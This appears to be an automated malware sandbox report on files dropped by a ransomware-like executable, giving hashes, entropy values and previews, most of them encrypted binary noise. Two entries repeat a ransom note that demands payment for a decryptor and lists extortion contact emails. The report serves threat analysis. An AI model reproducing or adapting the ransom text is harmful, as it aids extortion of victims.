                                                                                                                                              SSDEEP:24:gNdT/7MvxH49+XV2aIwJR7i94ZsUOO5KTOSMCaJREdQYVHT:idjwvxHxYaIwvtZs4GMv3Eq2
                                                                                                                                              MD5:874DEA891E9BABDF9926F3A4B14B5D2A
                                                                                                                                              SHA1:EB997296A8CC0B47EF5F14131CACB9CDF4B592D7
                                                                                                                                              SHA-256:3F9498FFB4217CBA7B90B7738886716E0A826034F71AA7599C07106FDF434A6E
                                                                                                                                              SHA-512:6FB66FC7C0548CFAEE068C72C2543DA81E837E63D898166CECB30794970E5D1F3A74A6552F55AC5FE1B80A3E185C8EC10165377F15FCDE459214E5F75BA405A2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview::...%h4..J...!..\BM....>.....K.7......o3`.KG.@..:5L..i.e...y5...^....Uq.;.A/qp.u.6YY..b.8...v.T6..5..D...TX.lD.)Ob....|N.b.[X.`..........l..2........8..j#K.%G..Uj\wE.Z.....~....FX.j...:7. q.."..~g.).....&.q...... .....mx...$S......R.u.L..t...'\.....:=2......Bi..IB`.F.l...0m..+..:...xv.r....JT<.H..u.I...I.O%.)p{[........GeR..............!R..#\9...p....F.b....i..5..{.....O..{3..~.*.@...}.X.g>.\..Y...O./=.O.u.2v......c..".../+PF...u...}.96K#.......k3.[m.5.......b..fB._..B*...J...z..;.W...|.E...A....kC.z..t.a.7........_L.....U...h+@m.8....I.kF.OP....,E..~m....C.;|".~.}=...7.#.=.M=.j.Ya$.}t.y.p.. +*;.w).........$T..u;...C./..........n2..5..t...^s.......'?..yJ*_...>......#..}.....P...W.......x.M..;....@.`......Zg...C+....].....p....y.......s.K...}....x..k.r...$...F..1.3...._....nn.../..g.+.k..}....S?..H.....y...m...N....l@=.g3...E..z9..F.4.......C......+......D.V..Q.F.d7...a...J.......]......b?*.m.GR-.0.{..6o....?+&rf..3.....90S..).....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.843149314910755
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:DSX6dPkVysZLMjsnJWAD+I3oqeqB7K+HikxL/qqJXSAiaBnMvMN7xS:g6dMLZLBnJWAD+vqeqcvkxTqqJR3osE
                                                                                                                                              MD5:9706DBC5975C3F554262BAC3BB372E36
                                                                                                                                              SHA1:721B18D8BFA9AFB77E2BA167CF014F85A96A4CFB
                                                                                                                                              SHA-256:FABB08CC8C334E7B9533E36475DC89CEECC93E8CB3749383CCE8BE70F7DF488A
                                                                                                                                              SHA-512:CBAB797A23255EE37AD1C8B10937DC7BC1806686DDB45811F0C874DD948DD2C1082E5C76E583E5F8690F684DC4336AEDFF2C58A47EE41ABA09932DC7748A251D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..9.....V.....k.%..\.<.].e.,....Y.Q.x........b..u|..|..-..-...D.`.W.&.H%.V]..z8..'j.....:A..........i........'.g..(s......I.zy...[..?.M..,i.`....;..5..~.=nX.B..>..%k..P.x..k^.,/.T0..?.@......p...N".=.lW.l..*FTk.4rS...~..B......[..`...,.m$......)B..?Pf.z.._....`.....JW..0.+-O5M..5LN...y....-.G.^.CcH..V...*.}.uQ.....2...^..@{S*j..Z..-M...{../.. !.E.m.......{n."....?(........b..92NI./.!....4.8.._.L..s.=.|..fV 0.2...t.R....M8;..k.MK.0..p...5.....\.{...........Axz.}+..Q...g*.FiM.....*Y...3...;...........`.sV..E....._\...>.,=.._(..dg.3.z.{R...@...$.r0...w.....!..t...........-.*.W...-.....|c..*.Y..[.K0,......b4h......h..6.u.........h.......Uf..P.R*..N...B...)...a..x.2.....&.....'.!.Cu.S..4c...p....y.%.S.......6....7.).....o.j!..+...c@.qR..ZW6....m.F.).....$.....I....w..>..YB...1..Z3.._CJ.J...%C.z...n.7.8.......$y..i.H..Sa..b..Ja..%uZ]....)f.....w`P..!-f...:g.....a^...Z.[.z.=2.v....;9..U..I...D..3{4*../.M...[.....-.Q....SdB.....qG-.......d.0........
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.843149314910755
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:DSX6dPkVysZLMjsnJWAD+I3oqeqB7K+HikxL/qqJXSAiaBnMvMN7xS:g6dMLZLBnJWAD+vqeqcvkxTqqJR3osE
                                                                                                                                              MD5:9706DBC5975C3F554262BAC3BB372E36
                                                                                                                                              SHA1:721B18D8BFA9AFB77E2BA167CF014F85A96A4CFB
                                                                                                                                              SHA-256:FABB08CC8C334E7B9533E36475DC89CEECC93E8CB3749383CCE8BE70F7DF488A
                                                                                                                                              SHA-512:CBAB797A23255EE37AD1C8B10937DC7BC1806686DDB45811F0C874DD948DD2C1082E5C76E583E5F8690F684DC4336AEDFF2C58A47EE41ABA09932DC7748A251D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..9.....V.....k.%..\.<.].e.,....Y.Q.x........b..u|..|..-..-...D.`.W.&.H%.V]..z8..'j.....:A..........i........'.g..(s......I.zy...[..?.M..,i.`....;..5..~.=nX.B..>..%k..P.x..k^.,/.T0..?.@......p...N".=.lW.l..*FTk.4rS...~..B......[..`...,.m$......)B..?Pf.z.._....`.....JW..0.+-O5M..5LN...y....-.G.^.CcH..V...*.}.uQ.....2...^..@{S*j..Z..-M...{../.. !.E.m.......{n."....?(........b..92NI./.!....4.8.._.L..s.=.|..fV 0.2...t.R....M8;..k.MK.0..p...5.....\.{...........Axz.}+..Q...g*.FiM.....*Y...3...;...........`.sV..E....._\...>.,=.._(..dg.3.z.{R...@...$.r0...w.....!..t...........-.*.W...-.....|c..*.Y..[.K0,......b4h......h..6.u.........h.......Uf..P.R*..N...B...)...a..x.2.....&.....'.!.Cu.S..4c...p....y.%.S.......6....7.).....o.j!..+...c@.qR..ZW6....m.F.).....$.....I....w..>..YB...1..Z3.._CJ.J...%C.z...n.7.8.......$y..i.H..Sa..b..Ja..%uZ]....)f.....w`P..!-f...:g.....a^...Z.[.z.=2.v....;9..U..I...D..3{4*../.M...[.....-.Q....SdB.....qG-.......d.0........
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.842823476884556
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Utyu6yZhr3DHFKtdOJka0p2a19Tf9pr0u1u1SbM9KjC6tj6VCn7e8:UtqyZh7DHN+aja19T2ZEP37e8
                                                                                                                                              MD5:C362748380D53C12BB4452D22218B62D
                                                                                                                                              SHA1:CC306989A585F288FA3504B567EC7550CAEDED17
                                                                                                                                              SHA-256:2FE7E13C8A2A9804975725E1041F1032E648ACCBFF6C6C5163B6834BF9141437
                                                                                                                                              SHA-512:277544D391125FCA15C712C7B5FAF8523A93215A163D2983C6BCAE74110971C52972D047840B5664F7781E83AA6BCD63A6104122E7EEBE7A09DBC2E7EF15A789
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..^nTD]q..&..y..t`m.B..1...cm._..>....9(!.+...[.vx.~5......|.......I...6!V..I5.Lz......t.^...".U...h...teK)n..H.........cNi...g...7q..!.........~Z.;...b..P....j...`.M@..D..&...j/J{...B..zZ,.FY.n\4.Z.&f..Q.@H..O.P.... .".2.f.3.'...'QB:..ZS..'.o..K75.....k3.9X...u..J.hJ......1...B.....(#~..r.a'.n......$.....S.13..0..b. .5O.>].G..v.z.OPn.....l......*x+......61....q...Qb.;.R.R.2.......s.*.`C.......i..~...3x.].B.. .Vl...|*[}.Px.....l..E..R..W. U...'.&.t.KHu.^|..e...U.$.{.h./:.z.WD.x.z..h......Z.....p ......9yip.NW..p...SQ..+....H...h.?........@..c.r.Jy....+...@.+..p.8.$......p..9...41.B.P....H..d...C.........0...}>.G..q..s.L..C..[y.9r<.S..>.J....H..........x...8.Y.....(1.yfX....rmI.......>.IQ....D......)6...-.9a..1.L..\OSm..u..H..s.[.{.>....|.tq{.L#..h./bq...{.0dv..`..<w.P".CL...x.g..........y.C.O..P.M..".C..x..J.....G..;.xO.F%.F....<l..P.:..e....OW.i..............}....l...,.........^?.k.N.,.........g,...:X.O.iD...Z...'v(y.f:hs@..U.._..@}.g..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.842823476884556
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Utyu6yZhr3DHFKtdOJka0p2a19Tf9pr0u1u1SbM9KjC6tj6VCn7e8:UtqyZh7DHN+aja19T2ZEP37e8
                                                                                                                                              MD5:C362748380D53C12BB4452D22218B62D
                                                                                                                                              SHA1:CC306989A585F288FA3504B567EC7550CAEDED17
                                                                                                                                              SHA-256:2FE7E13C8A2A9804975725E1041F1032E648ACCBFF6C6C5163B6834BF9141437
                                                                                                                                              SHA-512:277544D391125FCA15C712C7B5FAF8523A93215A163D2983C6BCAE74110971C52972D047840B5664F7781E83AA6BCD63A6104122E7EEBE7A09DBC2E7EF15A789
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..^nTD]q..&..y..t`m.B..1...cm._..>....9(!.+...[.vx.~5......|.......I...6!V..I5.Lz......t.^...".U...h...teK)n..H.........cNi...g...7q..!.........~Z.;...b..P....j...`.M@..D..&...j/J{...B..zZ,.FY.n\4.Z.&f..Q.@H..O.P.... .".2.f.3.'...'QB:..ZS..'.o..K75.....k3.9X...u..J.hJ......1...B.....(#~..r.a'.n......$.....S.13..0..b. .5O.>].G..v.z.OPn.....l......*x+......61....q...Qb.;.R.R.2.......s.*.`C.......i..~...3x.].B.. .Vl...|*[}.Px.....l..E..R..W. U...'.&.t.KHu.^|..e...U.$.{.h./:.z.WD.x.z..h......Z.....p ......9yip.NW..p...SQ..+....H...h.?........@..c.r.Jy....+...@.+..p.8.$......p..9...41.B.P....H..d...C.........0...}>.G..q..s.L..C..[y.9r<.S..>.J....H..........x...8.Y.....(1.yfX....rmI.......>.IQ....D......)6...-.9a..1.L..\OSm..u..H..s.[.{.>....|.tq{.L#..h./bq...{.0dv..`..<w.P".CL...x.g..........y.C.O..P.M..".C..x..J.....G..;.xO.F%.F....<l..P.:..e....OW.i..............}....l...,.........^?.k.N.,.........g,...:X.O.iD...Z...'v(y.f:hs@..U.._..@}.g..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.864379534337359
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:9fpYPiclfde2vJieZHVv1f7U08e4vRKVTIzcbNVnqPSPlmFbJtlrFw:9fp0ie7lj85sTIIbNVnqaPlmFPlrFw
                                                                                                                                              MD5:FB8A22036AFDD8D862371B36667FBC3E
                                                                                                                                              SHA1:44F1EF5234255D09E748FBD0F1D9EE1EF63B1562
                                                                                                                                              SHA-256:FFB3669A2D7E3D25D1D4B9B3F3F6AD4448C779A154476A1B6D0063C2F5595EBC
                                                                                                                                              SHA-512:F3BC03040985DF6F3FF4698F372FBA26E79EAF2532F852B525DCA4A845BCD0F2CEDDEA0F463A3CA619493A1E247E9801FEDF1884D1D2ED9F4239DA82B2667270
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......i..:..V...&.....K9....5:....]u.N..M.m...l`."..a/.A}.. . ...4.V"&.T$.....-.u"d..r....ti.V....X.)..Z.!.. ...6.....C.b..B.)=S"...7{(..a...=Z.@......(c.G.x...J.........S...%6....n..bd......m..p.@1A.%P..D..6=......s ......z..3..gi[z..$.,K.......:.'...)k..Q.?.33dT.$..h}..;m...z.Vd......r.N<...*.._.L.;/$..i. 1..3.p.....s.....s...O..%..:~.h.......C..{./.c... #R...|...X.e..u.N.b..>.\.#=....,..W...'D....../.#.~..V.2.{^.L....$Z.OB(...\..T..+aoL..'.e2.P.-......V..Z...%..P......}k..P8.2.......P........M....N7B..b?S..R1v...5%5...7.`....X.-.D"G..2..*~.Uf.EA5.~.4..Q...\"...E./^....=.5..C.I....w..s@y...t...`5.<..jb.1......$.~.k...u$&.....4,...........g..u...>).|.....<.~....Y1..&.qd.3.....^Q.T.zSN.{..w..X...../.%.e_....U..JId54W..5. ......o.K|...S.,.4..MgI!~.t.......D..6.`.Hk.85)....?...4Y..9.7zPJ..Q...\..A..Bg....,..b.....YO...u.,...:...f.`..h..U.o.Y^'.E......../0..x.gUM7.........a.......SZ......+.v.n..O9.6y.^wh{Wv.prCY.xu.*.....4k<"og...U.L,p5...c..L@
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.864379534337359
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:9fpYPiclfde2vJieZHVv1f7U08e4vRKVTIzcbNVnqPSPlmFbJtlrFw:9fp0ie7lj85sTIIbNVnqaPlmFPlrFw
                                                                                                                                              MD5:FB8A22036AFDD8D862371B36667FBC3E
                                                                                                                                              SHA1:44F1EF5234255D09E748FBD0F1D9EE1EF63B1562
                                                                                                                                              SHA-256:FFB3669A2D7E3D25D1D4B9B3F3F6AD4448C779A154476A1B6D0063C2F5595EBC
                                                                                                                                              SHA-512:F3BC03040985DF6F3FF4698F372FBA26E79EAF2532F852B525DCA4A845BCD0F2CEDDEA0F463A3CA619493A1E247E9801FEDF1884D1D2ED9F4239DA82B2667270
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......i..:..V...&.....K9....5:....]u.N..M.m...l`."..a/.A}.. . ...4.V"&.T$.....-.u"d..r....ti.V....X.)..Z.!.. ...6.....C.b..B.)=S"...7{(..a...=Z.@......(c.G.x...J.........S...%6....n..bd......m..p.@1A.%P..D..6=......s ......z..3..gi[z..$.,K.......:.'...)k..Q.?.33dT.$..h}..;m...z.Vd......r.N<...*.._.L.;/$..i. 1..3.p.....s.....s...O..%..:~.h.......C..{./.c... #R...|...X.e..u.N.b..>.\.#=....,..W...'D....../.#.~..V.2.{^.L....$Z.OB(...\..T..+aoL..'.e2.P.-......V..Z...%..P......}k..P8.2.......P........M....N7B..b?S..R1v...5%5...7.`....X.-.D"G..2..*~.Uf.EA5.~.4..Q...\"...E./^....=.5..C.I....w..s@y...t...`5.<..jb.1......$.~.k...u$&.....4,...........g..u...>).|.....<.~....Y1..&.qd.3.....^Q.T.zSN.{..w..X...../.%.e_....U..JId54W..5. ......o.K|...S.,.4..MgI!~.t.......D..6.`.Hk.85)....?...4Y..9.7zPJ..Q...\..A..Bg....,..b.....YO...u.,...:...f.`..h..U.o.Y^'.E......../0..x.gUM7.........a.......SZ......+.v.n..O9.6y.^wh{Wv.prCY.xu.*.....4k<"og...U.L,p5...c..L@
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.862675727704078
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:LBZqo3c3416n6mwGtaXl8+5s3QRUu+BtolCItLjiNlyEQlYOJkH:LuomF6mwGdp5u+BGPtnGlyEYhkH
                                                                                                                                              MD5:04F542831C43C97F82F518D3D4699319
                                                                                                                                              SHA1:0C01B4CCC45370BB684B667B5B4A6914729F3D8A
                                                                                                                                              SHA-256:B8A04F8252DB61703727221F370A3EB96E96FF303E1A36F65E95AF41210FA989
                                                                                                                                              SHA-512:7F7A4A4DBF61A0ED7E05CF05906D04E3F9756C90FB607BDA55DFF86BDEBB58404604C4F65A01287EE33F7EDEBB1711133FD61D1633FE143503632AE827260CCF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:M..A6..V...~.nI...#.Q..;......8...mJ..Og4.]W..$i.w..... .CY.A.....J..h@u.....5}.....^.. .@|;.|.t...?....R...S....J.T f y.Y.C(...+..>..fZ .......S...6..M.1...-!W.1.K.k9.1#.0.-...&[..f^K..*.r....o.S....C..t.....IC...r.w.....O1...U5.O.-q......7c...$.T. ..O...I)&.o..A..C.G..8.........c.Y.h..E.<...p.[..(.m...kv.P8.%...f...o..}.D.W..%...p.X.5.;.V"....V..**.V3#w.......vS.`.e......:..}.eG.3....[.v.*... ..j..{..y?............qV.W?......I...........r.3.{2fl.....k.n+....<..?.G0F.......6...2|'.^[..-..\......]..f.....%.\-..".<.&....w[U...3......r6.^. . +..u.).~..K.....1'g.g..........G..;"&.TR.u'5B..E.....*$..,y...X[nh.....PD..c.....x..a.....BM.......'.dV..E.K..a......y9....%.........>..R,7_&mn.7.ZE8..(M.n9.$.[..^w.Ocy..q..;..h...vm0....a`pY.......[..$.. .u....z...5.....3.ro.....S.g....e..`lI.-.e....]...(.K1......=Hz.V^.b.(.R.R...=....n..E....6h..zr8..\2;.H.Le........:...d.....R....*...U./...?.6....\I..[.".F._.......1..<.!]..5...Zy...p..p
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.862675727704078
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:LBZqo3c3416n6mwGtaXl8+5s3QRUu+BtolCItLjiNlyEQlYOJkH:LuomF6mwGdp5u+BGPtnGlyEYhkH
                                                                                                                                              MD5:04F542831C43C97F82F518D3D4699319
                                                                                                                                              SHA1:0C01B4CCC45370BB684B667B5B4A6914729F3D8A
                                                                                                                                              SHA-256:B8A04F8252DB61703727221F370A3EB96E96FF303E1A36F65E95AF41210FA989
                                                                                                                                              SHA-512:7F7A4A4DBF61A0ED7E05CF05906D04E3F9756C90FB607BDA55DFF86BDEBB58404604C4F65A01287EE33F7EDEBB1711133FD61D1633FE143503632AE827260CCF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:M..A6..V...~.nI...#.Q..;......8...mJ..Og4.]W..$i.w..... .CY.A.....J..h@u.....5}.....^.. .@|;.|.t...?....R...S....J.T f y.Y.C(...+..>..fZ .......S...6..M.1...-!W.1.K.k9.1#.0.-...&[..f^K..*.r....o.S....C..t.....IC...r.w.....O1...U5.O.-q......7c...$.T. ..O...I)&.o..A..C.G..8.........c.Y.h..E.<...p.[..(.m...kv.P8.%...f...o..}.D.W..%...p.X.5.;.V"....V..**.V3#w.......vS.`.e......:..}.eG.3....[.v.*... ..j..{..y?............qV.W?......I...........r.3.{2fl.....k.n+....<..?.G0F.......6...2|'.^[..-..\......]..f.....%.\-..".<.&....w[U...3......r6.^. . +..u.).~..K.....1'g.g..........G..;"&.TR.u'5B..E.....*$..,y...X[nh.....PD..c.....x..a.....BM.......'.dV..E.K..a......y9....%.........>..R,7_&mn.7.ZE8..(M.n9.$.[..^w.Ocy..q..;..h...vm0....a`pY.......[..$.. .u....z...5.....3.ro.....S.g....e..`lI.-.e....]...(.K1......=Hz.V^.b.(.R.R...=....n..E....6h..zr8..\2;.H.Le........:...d.....R....*...U./...?.6....\I..[.".F._.......1..<.!]..5...Zy...p..p
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.836959161636629
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:SRgm5lKRsBMpyLTJSxYtoa88AhGkxbFirdS/iP1FSsf1Xl6MGq:SRgQlfjTJSxpCVIihwuLfN16M7
                                                                                                                                              MD5:0F0ED19D837537C03BAD3A4A7EEAACF3
                                                                                                                                              SHA1:596F20170AD1CDCE707E9C00E600FBA01B487EA6
                                                                                                                                              SHA-256:EE982A2C1355359B57755DAF05D31FA345D0D99871930B5749EE95E9F11C2535
                                                                                                                                              SHA-512:DD309E6453DA324B58223C460674DD036D9FA722EDDB6BCA3A3115DE39CFF7F41A30BFE6B324E44B94F2DD43A7147059244D3518549EF13F19F3E54E0560E5AA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.E....|.....R..x.[..M.D3r..@~..[.U...r>.b.!.cG.O.7W...9...1w..f.5~f$e.U....'T..7EA..|l...K...+....&..G.,N..Y".i..Dl....;.H..4..wSc;..eJ.Ns..j./...Z...h.K...2.:d.W .X *X...-......m@...b.@...1<...yr8.g.M......$.D..v....NO).*..>&0.HY.E...i..].Nv..+................@...p....W..-..:.....H....@....l..s.m.(.<.-'0?...x...J6=\..7.Nl&.CFD.["..bH..U.....h$.d.;...`..N.Sr..$.*.MF...0....a.....\Y.>+.~.....jk..d...,8...q..=G.c-..`.0*..x{..=....<.P.e%.'~.}..........U....s.f.7N...w...UN.b6.;o..`?g..........'.f*...G&E..J..<.fT_....e5..Ob..w.,9.....1......|.......d.r.....7..3R...h....h.....w$...?GP.....W.H......?..-l/V.^.8.!.S.{.th.k.h.#T......0.j`.=..d..V?......):V.UFQ2.I]/....h...7/..X1gay.^..."uY.]....x..p.P..1.A.1.f.qpV...P.m).z.....%,......nM.....U.>.t..*n.....l.]..'.c...H.j,..!.D:H.....o\{....Q.%@>...8..n..lT'.M+q...b..v......^.1+}.3r)r.".=D..~...........2..... 2.V..fk.27......B..d^.g..m.VX.....k66.....V^...uu....7..2.'.U.+..%.X4W.#.Wv....."O.....z.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.836959161636629
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:SRgm5lKRsBMpyLTJSxYtoa88AhGkxbFirdS/iP1FSsf1Xl6MGq:SRgQlfjTJSxpCVIihwuLfN16M7
                                                                                                                                              MD5:0F0ED19D837537C03BAD3A4A7EEAACF3
                                                                                                                                              SHA1:596F20170AD1CDCE707E9C00E600FBA01B487EA6
                                                                                                                                              SHA-256:EE982A2C1355359B57755DAF05D31FA345D0D99871930B5749EE95E9F11C2535
                                                                                                                                              SHA-512:DD309E6453DA324B58223C460674DD036D9FA722EDDB6BCA3A3115DE39CFF7F41A30BFE6B324E44B94F2DD43A7147059244D3518549EF13F19F3E54E0560E5AA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.E....|.....R..x.[..M.D3r..@~..[.U...r>.b.!.cG.O.7W...9...1w..f.5~f$e.U....'T..7EA..|l...K...+....&..G.,N..Y".i..Dl....;.H..4..wSc;..eJ.Ns..j./...Z...h.K...2.:d.W .X *X...-......m@...b.@...1<...yr8.g.M......$.D..v....NO).*..>&0.HY.E...i..].Nv..+................@...p....W..-..:.....H....@....l..s.m.(.<.-'0?...x...J6=\..7.Nl&.CFD.["..bH..U.....h$.d.;...`..N.Sr..$.*.MF...0....a.....\Y.>+.~.....jk..d...,8...q..=G.c-..`.0*..x{..=....<.P.e%.'~.}..........U....s.f.7N...w...UN.b6.;o..`?g..........'.f*...G&E..J..<.fT_....e5..Ob..w.,9.....1......|.......d.r.....7..3R...h....h.....w$...?GP.....W.H......?..-l/V.^.8.!.S.{.th.k.h.#T......0.j`.=..d..V?......):V.UFQ2.I]/....h...7/..X1gay.^..."uY.]....x..p.P..1.A.1.f.qpV...P.m).z.....%,......nM.....U.>.t..*n.....l.]..'.c...H.j,..!.D:H.....o\{....Q.%@>...8..n..lT'.M+q...b..v......^.1+}.3r)r.".=D..~...........2..... 2.V..fk.27......B..d^.g..m.VX.....k66.....V^...uu....7..2.'.U.+..%.X4W.#.Wv....."O.....z.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.82320116060734
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ibaZuQFf2UHi3qZXmv/hFDqlx+KFw1SMt7uQO8T3J+T9FAZXcFBi5Db/IBG:cMdx9bio41zftT3uFIXei5vQA
                                                                                                                                              MD5:11AA7D713494805E006F79236A3A9571
                                                                                                                                              SHA1:0CCFDBD7D902F93FC88EEBC034D3EDAE5718EFA0
                                                                                                                                              SHA-256:936FC99FED31C95120BA951D4013E858F3FAB91EAE59563B2378DA1DFEBFC3AF
                                                                                                                                              SHA-512:829A960DDCBD333A6FC60F44BD0E1B2E3F04F0DB7A6CE026FA3DBA44F9594670C35BF96D9FCC813E57D70D137F2BA65BEF904D01C1A38946B6D266C519B9C7B3
                                                                                                                                              Malicious:false
